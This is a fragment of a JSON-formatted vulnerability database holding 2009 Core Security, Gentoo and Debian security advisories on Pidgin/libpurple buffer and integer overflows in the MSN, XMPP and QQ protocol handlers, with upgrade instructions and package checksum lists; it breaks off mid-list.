cyber\r\nattack planning and simulation, source code auditing, and cryptography.\r\nOur results include problem formalization, identification of\r\nvulnerabilities, novel solutions and prototypes for new technologies.\r\nCoreLabs regularly publishes security advisories, technical papers,\r\nproject information and shared software tools for public use at:\r\nhttp://www.coresecurity.com/corelabs.\r\n\r\n\r\n12. *About Core Security Technologies*\r\n\r\nCore Security Technologies develops strategic solutions that help\r\nsecurity-conscious organizations worldwide develop and maintain a\r\nproactive process for securing their networks. The company&#39;s flagship\r\nproduct, CORE IMPACT, is the most comprehensive product for performing\r\nenterprise security assurance testing. CORE IMPACT evaluates network,\r\nendpoint and end-user vulnerabilities and identifies what resources are\r\nexposed. It enables organizations to determine if current security\r\ninvestments are detecting and preventing attacks. Core Security\r\nTechnologies augments its leading technology solution with world-class\r\nsecurity consulting services, including penetration testing and software\r\nsecurity auditing. Based in Boston, MA and Buenos Aires, Argentina, Core\r\nSecurity Technologies can be reached at 617-399-6980 or on the Web at\r\nhttp://www.coresecurity.com.\r\n\r\n\r\n13. *Disclaimer*\r\n\r\nThe contents of this advisory are copyright &#40;c&#41; 2009 Core Security\r\nTechnologies and &#40;c&#41; 2009 CoreLabs, and may be distributed freely\r\nprovided that no fee is charged for this distribution and proper credit\r\nis given.\r\n\r\n\r\n14. *PGP/GPG Keys*\r\n\r\nThis advisory has been signed with the GPG key of Core Security\r\nTechnologies advisories team, which is available for download at\r\nhttp://www.coresecurity.com/files/attachments/core_security_advisories.asc.\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.8 &#40;MingW32&#41;\r\nComment: Using GnuPG with Mozilla - http://enigmail.mozdev.org\r\n\r\niEYEARECAAYFAkqLIpwACgkQyNibggitWa2yqgCeJ3qxJluj3aNZzz3Y6XPULeHa\r\nKG8AnRiJXqQ/XX2E0UKb1sQOeWGfJhIc\r\n=GQCO\r\n-----END PGP SIGNATURE-----", "edition": 1, "modified": "2009-08-19T00:00:00", "published": "2009-08-19T00:00:00", "id": "SECURITYVULNS:DOC:22344", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:22344", "title": "CORE-2009-0727: Libpurple msn_slplink_process_msg&#40;&#41; Arbitrary Write Vulnerability", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:09:30", "bulletinFamily": "software", "cvelist": ["CVE-2008-2927", "CVE-2009-1376"], "description": "Buffer overflow on MSN SLP messages parsing.", "edition": 1, "modified": "2009-06-09T00:00:00", "published": "2009-06-09T00:00:00", "id": "SECURITYVULNS:VULN:9250", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:9250", "title": "libpurple / Pidgin buffer overflow", "type": "securityvulns", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "gentoo": [{"lastseen": "2016-09-06T19:46:03", "bulletinFamily": "unix", "cvelist": ["CVE-2008-2927", "CVE-2009-1376", "CVE-2009-1375", "CVE-2009-1374", "CVE-2009-1373"], "description": "### Background\n\nPidgin (formerly Gaim) is an instant messaging client for a variety of instant messaging protocols. \n\n### Description\n\nMultiple vulnerabilities have been discovered in Pidgin: \n\n * Veracode reported a boundary error in the \"XMPP SOCKS5 bytestream server\" when initiating an outgoing file transfer (CVE-2009-1373).\n * Ka-Hing Cheung reported a heap corruption flaw in the QQ protocol handler (CVE-2009-1374).\n * A memory corruption flaw in \"PurpleCircBuffer\" was disclosed by Josef Andrysek (CVE-2009-1375).\n * The previous fix for CVE-2008-2927 contains a cast from uint64 to size_t, possibly leading to an integer overflow (CVE-2009-1376, GLSA 200901-13).\n\n### Impact\n\nA remote attacker could send specially crafted messages or files using the MSN, XMPP or QQ protocols, possibly resulting in the execution of arbitrary code with the privileges of the user running the application, or a Denial of Service. NOTE: Successful exploitation might require the victim's interaction. \n\n### Workaround\n\nThere is no known workaround at this time. \n\n### Resolution\n\nAll Pidgin users should upgrade to the latest version: \n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=net-im/pidgin-2.5.6\"", "edition": 1, "modified": "2009-05-25T00:00:00", "published": "2009-05-25T00:00:00", "id": "GLSA-200905-07", "href": "https://security.gentoo.org/glsa/200905-07", "type": "gentoo", "title": "Pidgin: Multiple vulnerabilities", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "debian": [{"lastseen": "2020-11-11T13:17:08", "bulletinFamily": "unix", "cvelist": ["CVE-2008-2927", "CVE-2009-1376", "CVE-2009-1375", "CVE-2009-1374", "CVE-2009-1889", "CVE-2009-1373"], "description": "Gerfried Fuchs uploaded new packages for pidgin which fixed the\nfollowing security problems:\n\nCVE-2009-1373\n\n Buffer overflow in the XMPP SOCKS5 bytestream server in Pidgin\n (formerly Gaim) before 2.5.6 allows remote authenticated users to\n execute arbitrary code via vectors involving an outbound XMPP file\n transfer.\n\nCVE-2009-1374\n\n Buffer overflow in the decrypt_out function in Pidgin (formerly Gaim)\n before 2.5.6 allows remote attackers to cause a denial of service\n (application crash) via a QQ packet. \n\nCVE-2009-1375\n\n The PurpleCircBuffer implementation in Pidgin (formerly Gaim) before\n 2.5.6 does not properly maintain a certain buffer, which allows remote\n attackers to cause a denial of service (memory corruption and\n application crash) via vectors involving the (1) XMPP or (2) Sametime\n protocol. \n\nCVE-2009-1376\n\n Multiple integer overflows in the msn_slplink_process_msg functions in\n the MSN protocol handler in (1) libpurple/protocols/msn/slplink.c and\n (2) libpurple/protocols/msnp9/slplink.c in Pidgin (formerly Gaim)\n before 2.5.6 on 32-bit platforms allow remote attackers to execute\n arbitrary code via a malformed SLP message with a crafted offset\n value, leading to buffer overflows. NOTE: this issue exists because of\n an incomplete fix for CVE-2008-2927. \n\nCVE-2009-1889, Debian Bug #535790\n\n The OSCAR protocol implementation in Pidgin before 2.5.8 misinterprets\n the ICQWebMessage message type as the ICQSMS message type, which\n allows remote attackers to cause a denial of service (application\n crash) via a crafted ICQ web message that triggers allocation of a\n large amount of memory. \n\nFor the lenny-backports distribution the problems (with the exception of\nCVE-2009-1889) have been fixed in version 2.4.3-4lenny2.\n\nFor the squeeze and sid distributions the problems have been fixed in\nversion 2.5.8-1.\n\n\nUpgrade instructions\n--------------------\n\nIf you don&#x27;t use pinning (see [1]) you have to update the packages\nmanually via &quot;apt-get -t etch-backports install &lt;packagelist&gt;&quot; with the\npackagelist of your installed packages affected by this update.\n[1] &lt;http://backports.org/dokuwiki/doku.php?id=instructions&gt;\n\nWe recommend to pin the backports repository to 200 so that new versions\nof installed backports will be installed automatically:\n\n Package: *\n Pin: release a=etch-backports\n Pin-Priority: 200\n", "edition": 3, "modified": "2009-07-29T21:34:46", "published": "2009-07-29T21:34:46", "id": "DEBIAN:7CBCBF8C24D8988DB95B28F0FFCF75C8:F574C", "href": "https://lists.debian.org/debian-backports-announce/2009/debian-backports-announce-200907/msg00003.html", "title": "[Backports-security-announce] Security Update for pidgin", "type": "debian", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-11-11T13:24:22", "bulletinFamily": "unix", "cvelist": ["CVE-2008-2927", "CVE-2009-1376", "CVE-2009-1375", "CVE-2009-1373"], "description": "- ------------------------------------------------------------------------\nDebian Security Advisory DSA-1805-1 security@debian.org\nhttp://www.debian.org/security/ Moritz Muehlenhoff\nMay 22, 2009 http://www.debian.org/security/faq\n- ------------------------------------------------------------------------\n\nPackage : pidgin\nVulnerability : several\nProblem type : remote\nDebian-specific: no\nCVE Id(s) : CVE-2009-1373 CVE-2009-1375 CVE-2009-1376\n\nSeveral vulnerabilities have been discovered in Pidgin, a graphical\nmulti-protocol instant messaging client. The Common Vulnerabilities and\nExposures project identifies the following problems:\n\nCVE-2009-1373\n\n A buffer overflow in the Jabber file transfer code may lead to\n denial of service or the execution of arbitrary code.\n\nCVE-2009-1375\n\n Memory corruption in an internal library may lead to denial of\n service.\n\nCVE-2009-1376\n\n The patch provided for the security issue tracked as CVE-2008-2927\n - integer overflows in the MSN protocol handler - was found to be\n incomplete.\n\nThe old stable distribution (etch) is affected under the source package\nname gaim. However, due to build problems the updated packages couldn&#x27;t\nbe released along with the stable version. It will be released once the\nbuild problem is resolved.\n\nFor the stable distribution (lenny), these problems have been fixed in\nversion 2.4.3-4lenny2.\n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 2.5.6-1.\n\nWe recommend that you upgrade your pidgin packages.\n\nUpgrade instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\n\nDebian GNU/Linux 5.0 alias lenny\n- --------------------------------\n\nStable updates are available for alpha, amd64, arm, armel, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc.\n\nSource archives:\n\n http://security.debian.org/pool/updates/main/p/pidgin/pidgin_2.4.3-4lenny2.dsc\n Size/MD5 checksum: 1784 3cfbe1a429a466d82ca72b8c1ac40754\n http://security.debian.org/pool/updates/main/p/pidgin/pidgin_2.4.3-4lenny2.diff.gz\n Size/MD5 checksum: 67015 ca8a67c8a5fbb7952c39e96dfc1c92d6\n http://security.debian.org/pool/updates/main/p/pidgin/pidgin_2.4.3.orig.tar.gz\n Size/MD5 checksum: 13123610 d0e0bd218fbc67df8b2eca2f21fcd427\n\nArchitecture independent packages:\n\n http://security.debian.org/pool/updates/main/p/pidgin/libpurple-bin_2.4.3-4lenny2_all.deb\n Size/MD5 checksum: 133450 0da42200c15fa112d10949833c7b656d\n http://security.debian.org/pool/updates/main/p/pidgin/libpurple-dev_2.4.3-4lenny2_all.deb\n Size/MD5 checksum: 276786 98123cf4a705addb4f011b1a9aa42806\n http://security.debian.org/pool/updates/main/p/pidgin/finch-dev_2.4.3-4lenny2_all.deb\n Size/MD5 checksum: 159310 af40922a5c347da65bb3287d7832f488\n http://security.debian.org/pool/updates/main/p/pidgin/pidgin-dev_2.4.3-4lenny2_all.deb\n Size/MD5 checksum: 193330 79cfc03245a6ee2d54f3f1f8f2437f97\n http://security.debian.org/pool/updates/main/p/pidgin/pidgin-data_2.4.3-4lenny2_all.deb\n Size/MD5 checksum: 7018686 2c14cc93703b4d57f1134280ef019f87\n\nalpha architecture (DEC Alpha)\n\n http://security.debian.org/pool/updates/main/p/pidgin/pidgin_2.4.3-4lenny2_alpha.deb\n Size/MD5 checksum: 776034 998feb438dce3551770cc3f98576246b\n http://security.debian.org/pool/updates/main/p/pidgin/pidgin-dbg_2.4.3-4lenny2_alpha.deb\n Size/MD5 checksum: 5543240 5190a80c71672e30de68d6f5ce3385f5\n http://security.debian.org/pool/updates/main/p/pidgin/finch_2.4.3-4lenny2_alpha.deb\n Size/MD5 checksum: 370102 6ca853190995d40ffe833c19a9d0b130\n http://security.debian.org/pool/updates/main/p/pidgin/libpurple0_2.4.3-4lenny2_alpha.deb\n Size/MD5 checksum: 1800160 f6d957047912550df9f2876cc3ae7d8a\n\namd64 architecture (AMD x86_64 (AMD64))\n\n http://security.debian.org/pool/updates/main/p/pidgin/pidgin-dbg_2.4.3-4lenny2_amd64.deb\n Size/MD5 checksum: 5669542 1e21b6071f0947ac4153147ff07bb546\n http://security.debian.org/pool/updates/main/p/pidgin/pidgin_2.4.3-4lenny2_amd64.deb\n Size/MD5 checksum: 727040 bef84ab7a06038f3c47532809873823f\n http://security.debian.org/pool/updates/main/p/pidgin/finch_2.4.3-4lenny2_amd64.deb\n Size/MD5 checksum: 347640 8d9b18516cb3f836cafed50fca1425dd\n http://security.debian.org/pool/updates/main/p/pidgin/libpurple0_2.4.3-4lenny2_amd64.deb\n Size/MD5 checksum: 1713090 e6224ab98f1d68df3cb10a6c2033bf06\n\narm architecture (ARM)\n\n http://security.debian.org/pool/updates/main/p/pidgin/pidgin_2.4.3-4lenny2_arm.deb\n Size/MD5 checksum: 656814 240d7bf1b6f79ad6a31fed92eedf6080\n http://security.debian.org/pool/updates/main/p/pidgin/pidgin-dbg_2.4.3-4lenny2_arm.deb\n Size/MD5 checksum: 5358320 f7c4ea8a35083db8e461bad0b70906fa\n http://security.debian.org/pool/updates/main/p/pidgin/finch_2.4.3-4lenny2_arm.deb\n Size/MD5 checksum: 316126 68b0666de2045a8574f7d50919883858\n http://security.debian.org/pool/updates/main/p/pidgin/libpurple0_2.4.3-4lenny2_arm.deb\n Size/MD5 checksum: 1490918 46ae049e5cb0539870f305e4868e2e42\n\narmel architecture (ARM EABI)\n\n http://security.debian.org/pool/updates/main/p/pidgin/pidgin-dbg_2.4.3-4lenny2_armel.deb\n Size/MD5 checksum: 5383624 73ae62f4b416c5ebfc792231c66f8ca1\n http://security.debian.org/pool/updates/main/p/pidgin/finch_2.4.3-4lenny2_armel.deb\n Size/MD5 checksum: 319456 546b24abfb2c38aa2572ba90c48bc095\n http://security.debian.org/pool/updates/main/p/pidgin/pidgin_2.4.3-4lenny2_armel.deb\n Size/MD5 checksum: 667564 a30c4906f3ad9ca042741c122b99cf31\n http://security.debian.org/pool/updates/main/p/pidgin/libpurple0_2.4.3-4lenny2_armel.deb\n Size/MD5 checksum: 1494952 a51898e2f3766423dbe6b584769b6db0\n\nhppa architecture (HP PA RISC)\n\n http://security.debian.org/pool/updates/main/p/pidgin/pidgin_2.4.3-4lenny2_hppa.deb\n Size/MD5 checksum: 753668 f70ef43544c55771852789bec4bf94e0\n http://security.debian.org/pool/updates/main/p/pidgin/pidgin-dbg_2.4.3-4lenny2_hppa.deb\n Size/MD5 checksum: 5489574 64a4227ef892258851004c21841b94e6\n http://security.debian.org/pool/updates/main/p/pidgin/finch_2.4.3-4lenny2_hppa.deb\n Size/MD5 checksum: 361010 52121ede100f605ea53423fff2d7300a\n http://security.debian.org/pool/updates/main/p/pidgin/libpurple0_2.4.3-4lenny2_hppa.deb\n Size/MD5 checksum: 1827456 aacc5b3a8fadc0d4576e7a191c457e68\n\ni386 architecture (Intel ia32)\n\n http://security.debian.org/pool/updates/main/p/pidgin/libpurple0_2.4.3-4lenny2_i386.deb\n Size/MD5 checksum: 1584030 b7241b147ae106b236b3c19860b3fd04\n http://security.debian.org/pool/updates/main/p/pidgin/pidgin_2.4.3-4lenny2_i386.deb\n Size/MD5 checksum: 680872 399492517586fb1277892bd3fb3bf7b5\n http://security.debian.org/pool/updates/main/p/pidgin/pidgin-dbg_2.4.3-4lenny2_i386.deb\n Size/MD5 checksum: 5374090 0408715682fda4b1fcb1945e7d6770ee\n http://security.debian.org/pool/updates/main/p/pidgin/finch_2.4.3-4lenny2_i386.deb\n Size/MD5 checksum: 326552 eba36a04da368b35f858a88f1034469c\n\nia64 architecture (Intel ia64)\n\n http://security.debian.org/pool/updates/main/p/pidgin/pidgin_2.4.3-4lenny2_ia64.deb\n Size/MD5 checksum: 948018 def22510f06bbb084d56b6c402a474cc\n http://security.debian.org/pool/updates/main/p/pidgin/libpurple0_2.4.3-4lenny2_ia64.deb\n Size/MD5 checksum: 2194234 8891d61cba33f2a9e434e7e12541a636\n http://security.debian.org/pool/updates/main/p/pidgin/finch_2.4.3-4lenny2_ia64.deb\n Size/MD5 checksum: 434572 19b4d9631440cf2fe92abfd032ed8bfd\n http://security.debian.org/pool/updates/main/p/pidgin/pidgin-dbg_2.4.3-4lenny2_ia64.deb\n Size/MD5 checksum: 5223568 d6e5076c460293e3265147b26434c1d8\n\nmips architecture (MIPS (Big Endian))\n\n http://security.debian.org/pool/updates/main/p/pidgin/pidgin-dbg_2.4.3-4lenny2_mips.deb\n Size/MD5 checksum: 5655552 3939bde10319e1ed310d607f782e692e\n http://security.debian.org/pool/updates/main/p/pidgin/pidgin_2.4.3-4lenny2_mips.deb\n Size/MD5 checksum: 653818 5ba191b2eb2d299ab36f8f08a2261bf4\n http://security.debian.org/pool/updates/main/p/pidgin/finch_2.4.3-4lenny2_mips.deb\n Size/MD5 checksum: 318128 3e41d036421525584379abce4d893d17\n http://security.debian.org/pool/updates/main/p/pidgin/libpurple0_2.4.3-4lenny2_mips.deb\n Size/MD5 checksum: 1373126 f4d12c42ad8577233f6f289e5ee27a49\n\nmipsel architecture (MIPS (Little Endian))\n\n http://security.debian.org/pool/updates/main/p/pidgin/finch_2.4.3-4lenny2_mipsel.deb\n Size/MD5 checksum: 318118 2f291b88715934b7ab36f6f551e5bb25\n http://security.debian.org/pool/updates/main/p/pidgin/libpurple0_2.4.3-4lenny2_mipsel.deb\n Size/MD5 checksum: 1358266 ca0716e2a4bcf3d6737913a6f13b03ab\n http://security.debian.org/pool/updates/main/p/pidgin/pidgin_2.4.3-4lenny2_mipsel.deb\n Size/MD5 checksum: 650804 258c2a0b93d7714120346ec6037c79f2\n http://security.debian.org/pool/updates/main/p/pidgin/pidgin-dbg_2.4.3-4lenny2_mipsel.deb\n Size/MD5 checksum: 5544090 ff48eadd054ae5c758920e8ca8f42df4\n\npowerpc architecture (PowerPC)\n\n http://security.debian.org/pool/updates/main/p/pidgin/libpurple0_2.4.3-4lenny2_powerpc.deb\n Size/MD5 checksum: 1760236 03b52ff4df575157cc21ed1b86e925af\n http://security.debian.org/pool/updates/main/p/pidgin/finch_2.4.3-4lenny2_powerpc.deb\n Size/MD5 checksum: 362840 9f65e44425a193783f9f1201050a6be3\n http://security.debian.org/pool/updates/main/p/pidgin/pidgin-dbg_2.4.3-4lenny2_powerpc.deb\n Size/MD5 checksum: 5578900 0e70281f616a1cd67d02c4a5e07c776f\n http://security.debian.org/pool/updates/main/p/pidgin/pidgin_2.4.3-4lenny2_powerpc.deb\n Size/MD5 checksum: 753758 642d77cf4334d7c4aa8a84bb7d9699f8\n\ns390 architecture (IBM S/390)\n\n http://security.debian.org/pool/updates/main/p/pidgin/pidgin_2.4.3-4lenny2_s390.deb\n Size/MD5 checksum: 717168 cd1cb86f77fe1e618d9672d28af70170\n http://security.debian.org/pool/updates/main/p/pidgin/pidgin-dbg_2.4.3-4lenny2_s390.deb\n Size/MD5 checksum: 5566916 20978bccaccbc40cbc5d4724627f148c\n http://security.debian.org/pool/updates/main/p/pidgin/finch_2.4.3-4lenny2_s390.deb\n Size/MD5 checksum: 358728 8bab5444b68d96d61ad17d4a06572828\n http://security.debian.org/pool/updates/main/p/pidgin/libpurple0_2.4.3-4lenny2_s390.deb\n Size/MD5 checksum: 1645716 c70783f5beacb8de41aecec6716f1a5a\n\nsparc architecture (Sun SPARC/UltraSPARC)\n\n http://security.debian.org/pool/updates/main/p/pidgin/pidgin-dbg_2.4.3-4lenny2_sparc.deb\n Size/MD5 checksum: 5138450 93d398c20768690981b72145004b55cb\n http://security.debian.org/pool/updates/main/p/pidgin/pidgin_2.4.3-4lenny2_sparc.deb\n Size/MD5 checksum: 682926 4487a4faeb57750c1b63a437caefee8c\n http://security.debian.org/pool/updates/main/p/pidgin/libpurple0_2.4.3-4lenny2_sparc.deb\n Size/MD5 checksum: 1587786 2d2a043944b81d6cbcedf092c9f6e005\n http://security.debian.org/pool/updates/main/p/pidgin/finch_2.4.3-4lenny2_sparc.deb\n Size/MD5 checksum: 327572 9dcaa99102693093ef770e24e748dd0c\n\n\n These files will probably be moved into the stable distribution on\n its next update.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show &lt;pkg&gt;&#x27; and http://packages.debian.org/&lt;pkg&gt;\n", "edition": 3, "modified": "2009-05-22T20:04:22", "published": "2009-05-22T20:04:22", "id": "DEBIAN:DSA-1805-1:A94A0", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2009/msg00117.html", "title": "[SECURITY] [DSA 1805-1] New pidgin packages fix several vulnerabilities", "type": "debian", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-11-11T13:24:05", "bulletinFamily": "unix", "cvelist": ["CVE-2008-2927", "CVE-2009-1376", "CVE-2009-2694"], "description": "- --------------------------------------------------------------------------\nDebian Security Advisory DSA-1870-1 security@debian.org\nhttp://www.debian.org/security/ Nico Golde\nAugust 19th, 2009 http://www.debian.org/security/faq\n- --------------------------------------------------------------------------\n\nPackage : pidgin\nVulnerability : insufficient input validation\nProblem type : remote\nDebian-specific: no\nCVE ID : CVE-2009-2694\n\nFederico Muttis discovered that libpurple, the shared library that adds\nsupport for various instant messaging networks to the pidgin IM client, is\nvulnerable to a heap-based buffer overflow. This issue exists because of\nan incomplete fix for CVE-2008-2927 and CVE-2009-1376. An attacker can\nexploit this by sending two consecutive SLP packets to a victim via MSN.\n\nThe first packet is used to create an SLP message object with an offset of\nzero, the second packet then contains a crafted offset which hits the\nvulnerable code originally fixed in CVE-2008-2927 and CVE-2009-1376 and\nallows an attacker to execute arbitrary code.\n\nNote: Users with the &quot;Allow only the users below&quot; setting are not vulnerable\n to this attack. If you can&#x27;t install the below updates you may want to\n set this via Tools-&gt;Privacy.\n\n\nFor the stable distribution (lenny), this problem has been fixed in\nversion 2.4.3-4lenny3.\n\nFor the testing distribution (squeeze), this problem will be fixed soon.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 2.5.9-1.\n\nWe recommend that you upgrade your pidgin packages.\n\nUpgrade instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\nDebian GNU/Linux 5.0 alias lenny\n- --------------------------------\n\nDebian (stable)\n- ---------------\n\nStable updates are available for alpha, amd64, arm, armel, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc.\n\nSource archives:\n\n http://security.debian.org/pool/updates/main/p/pidgin/pidgin_2.4.3.orig.tar.gz\n Size/MD5 checksum: 13123610 d0e0bd218fbc67df8b2eca2f21fcd427\n http://security.debian.org/pool/updates/main/p/pidgin/pidgin_2.4.3-4lenny3.dsc\n Size/MD5 checksum: 1784 e9bc246ba4f0ca8dab1436d66bd00adb\n http://security.debian.org/pool/updates/main/p/pidgin/pidgin_2.4.3-4lenny3.diff.gz\n Size/MD5 checksum: 67928 545981a43e8c1b905ea1adb0da9b1b4d\n\nArchitecture independent packages:\n\n http://security.debian.org/pool/updates/main/p/pidgin/libpurple-bin_2.4.3-4lenny3_all.deb\n Size/MD5 checksum: 133552 d4adb0ff7da09da14d34f3ae9484ea94\n http://security.debian.org/pool/updates/main/p/pidgin/pidgin-data_2.4.3-4lenny3_all.deb\n Size/MD5 checksum: 7018488 09b2f817c71774e2108b4366602f5dcf\n http://security.debian.org/pool/updates/main/p/pidgin/libpurple-dev_2.4.3-4lenny3_all.deb\n Size/MD5 checksum: 276890 dab9b30c46f9a2c03af02d381cb029cf\n http://security.debian.org/pool/updates/main/p/pidgin/pidgin-dev_2.4.3-4lenny3_all.deb\n Size/MD5 checksum: 354146 291a984ea00f92d67a3d0b99040d7d72\n http://security.debian.org/pool/updates/main/p/pidgin/finch-dev_2.4.3-4lenny3_all.deb\n Size/MD5 checksum: 159388 f73823fb36f1d0487cc29d0d71a7a471\n\nalpha architecture (DEC Alpha)\n\n http://security.debian.org/pool/updates/main/p/pidgin/finch_2.4.3-4lenny3_alpha.deb\n Size/MD5 checksum: 369628 cd01f407199d1ca84f2502c4f4d169db\n http://security.debian.org/pool/updates/main/p/pidgin/pidgin_2.4.3-4lenny3_alpha.deb\n Size/MD5 checksum: 779192 fdb6b047a48f3c255fa13a329dc5fc35\n http://security.debian.org/pool/updates/main/p/pidgin/pidgin-dbg_2.4.3-4lenny3_alpha.deb\n Size/MD5 checksum: 5545960 fe294dfeb4dd7ca7ff6e5636230c856c\n http://security.debian.org/pool/updates/main/p/pidgin/libpurple0_2.4.3-4lenny3_alpha.deb\n Size/MD5 checksum: 1803004 81ef9e0af747f0b236b25b1407d38266\n\namd64 architecture (AMD x86_64 (AMD64))\n\n http://security.debian.org/pool/updates/main/p/pidgin/finch_2.4.3-4lenny3_amd64.deb\n Size/MD5 checksum: 345894 4b31436a96b5834d8ebe3639b837093d\n http://security.debian.org/pool/updates/main/p/pidgin/pidgin-dbg_2.4.3-4lenny3_amd64.deb\n Size/MD5 checksum: 5668550 58b27242ababd545a49b080527cd8769\n http://security.debian.org/pool/updates/main/p/pidgin/pidgin_2.4.3-4lenny3_amd64.deb\n Size/MD5 checksum: 722220 e249e5fb7581ec28a0f4e0a32fab3d2c\n http://security.debian.org/pool/updates/main/p/pidgin/libpurple0_2.4.3-4lenny3_amd64.deb\n Size/MD5 checksum: 1706142 2f1f823ff5c26eb1cc67874633a6891d\n\narm architecture (ARM)\n\n http://security.debian.org/pool/updates/main/p/pidgin/finch_2.4.3-4lenny3_arm.deb\n Size/MD5 checksum: 315182 d935ef53df9f333d0b2eb8d38e2bb753\n http://security.debian.org/pool/updates/main/p/pidgin/pidgin_2.4.3-4lenny3_arm.deb\n Size/MD5 checksum: 655088 8631310cc8beb7902fef81b51af01fd8\n http://security.debian.org/pool/updates/main/p/pidgin/libpurple0_2.4.3-4lenny3_arm.deb\n Size/MD5 checksum: 1490226 cfe0d6727f4a9aa671a3413817fb11ae\n http://security.debian.org/pool/updates/main/p/pidgin/pidgin-dbg_2.4.3-4lenny3_arm.deb\n Size/MD5 checksum: 5348504 d1ef7ddf61f0e44f46c646e4f4add280\n\narmel architecture (ARM EABI)\n\n http://security.debian.org/pool/updates/main/p/pidgin/pidgin-dbg_2.4.3-4lenny3_armel.deb\n Size/MD5 checksum: 5386792 c5d2643ba6bc47aa41de04b870bbca3d\n http://security.debian.org/pool/updates/main/p/pidgin/pidgin_2.4.3-4lenny3_armel.deb\n Size/MD5 checksum: 666444 507fd3b558360b054d67843f3dba2689\n http://security.debian.org/pool/updates/main/p/pidgin/finch_2.4.3-4lenny3_armel.deb\n Size/MD5 checksum: 318828 fcaea331f126eb2329bf54d0c8df7269\n http://security.debian.org/pool/updates/main/p/pidgin/libpurple0_2.4.3-4lenny3_armel.deb\n Size/MD5 checksum: 1496868 1ac8d58c00019b1b0a3d742d4a02d074\n\nhppa architecture (HP PA RISC)\n\n http://security.debian.org/pool/updates/main/p/pidgin/finch_2.4.3-4lenny3_hppa.deb\n Size/MD5 checksum: 361112 366c71f9035322402a6c0bae4fe4d8a0\n http://security.debian.org/pool/updates/main/p/pidgin/pidgin-dbg_2.4.3-4lenny3_hppa.deb\n Size/MD5 checksum: 5489632 53fed112a1e8642c0f682fc29f361a4a\n http://security.debian.org/pool/updates/main/p/pidgin/libpurple0_2.4.3-4lenny3_hppa.deb\n Size/MD5 checksum: 1827630 14a3a37c121b1e13c031f8894c5f4f64\n http://security.debian.org/pool/updates/main/p/pidgin/pidgin_2.4.3-4lenny3_hppa.deb\n Size/MD5 checksum: 753796 d50a7d1ba32773f791872bce6305b92c\n\ni386 architecture (Intel ia32)\n\n http://security.debian.org/pool/updates/main/p/pidgin/libpurple0_2.4.3-4lenny3_i386.deb\n Size/MD5 checksum: 1584144 54aeb3d38dd0cae7e486dab84a82cbb8\n http://security.debian.org/pool/updates/main/p/pidgin/pidgin_2.4.3-4lenny3_i386.deb\n Size/MD5 checksum: 680948 8144b0b957e103cedd0a617e37a3feae\n http://security.debian.org/pool/updates/main/p/pidgin/finch_2.4.3-4lenny3_i386.deb\n Size/MD5 checksum: 326656 4d75eb89954a304b036d5f14e751f72a\n http://security.debian.org/pool/updates/main/p/pidgin/pidgin-dbg_2.4.3-4lenny3_i386.deb\n Size/MD5 checksum: 5374132 2640104cb54145afda5a685607a1e74c\n\nia64 architecture (Intel ia64)\n\n http://security.debian.org/pool/updates/main/p/pidgin/pidgin-dbg_2.4.3-4lenny3_ia64.deb\n Size/MD5 checksum: 5223582 02aa16c2f23681d9123f0fe35e3414fd\n http://security.debian.org/pool/updates/main/p/pidgin/finch_2.4.3-4lenny3_ia64.deb\n Size/MD5 checksum: 434672 fcc166e5359603ec5a02953f36b30e33\n http://security.debian.org/pool/updates/main/p/pidgin/pidgin_2.4.3-4lenny3_ia64.deb\n Size/MD5 checksum: 948114 38eb5dfe87ba4ffa01ace8cf7db745c4\n http://security.debian.org/pool/updates/main/p/pidgin/libpurple0_2.4.3-4lenny3_ia64.deb\n Size/MD5 checksum: 2194278 82db59131767124c1cef53a9ef03de9e\n\nmips architecture (MIPS (Big Endian))\n\n http://security.debian.org/pool/updates/main/p/pidgin/pidgin-dbg_2.4.3-4lenny3_mips.deb\n Size/MD5 checksum: 5655702 d2694b5874bccdc4bde1a2debf2f1ad7\n http://security.debian.org/pool/updates/main/p/pidgin/pidgin_2.4.3-4lenny3_mips.deb\n Size/MD5 checksum: 653944 c39d08c1fe964baa5c1ff533432f7c4d\n http://security.debian.org/pool/updates/main/p/pidgin/libpurple0_2.4.3-4lenny3_mips.deb\n Size/MD5 checksum: 1373212 9673d5480375e78dae3741b32615e112\n http://security.debian.org/pool/updates/main/p/pidgin/finch_2.4.3-4lenny3_mips.deb\n Size/MD5 checksum: 318262 aaff22798d1a88aa2d2e04b24b9a7932\n\npowerpc architecture (PowerPC)\n\n http://security.debian.org/pool/updates/main/p/pidgin/pidgin-dbg_2.4.3-4lenny3_powerpc.deb\n Size/MD5 checksum: 5579128 be3d6412d3c5f41344f2b6a5a8f39bfe\n 